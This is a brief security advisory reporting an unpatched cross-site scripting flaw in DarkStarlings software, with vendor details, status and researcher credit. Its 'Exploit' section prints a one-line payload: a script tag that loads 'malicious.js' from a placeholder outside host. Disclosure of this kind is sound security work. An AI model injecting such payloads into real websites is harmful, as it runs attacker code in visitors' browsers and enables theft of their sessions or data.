--------------------Summary---------------- Vendor: DarkStarlings Vendor's Web Site: http://www.darkstarlings.com/ Software: All products Versions: All versions Critical Level: Moderate Type: Cross-Site Scripting Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: Will Boyce (mail@xxxxxxxxxxxxx) -----------------Description--------------- Arbitrary script code insertion is possible in <script> tags <script> tag isn't properly sanitized. This can be used to post arbitrary script code. --------------Exploit---------------------- <script language="text/javascript" src="http://url/malicious.js";> --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: Will Boyce (mail@xxxxxxxxxxxxx) -- Regards, Will Boyce. http://willboyce.com
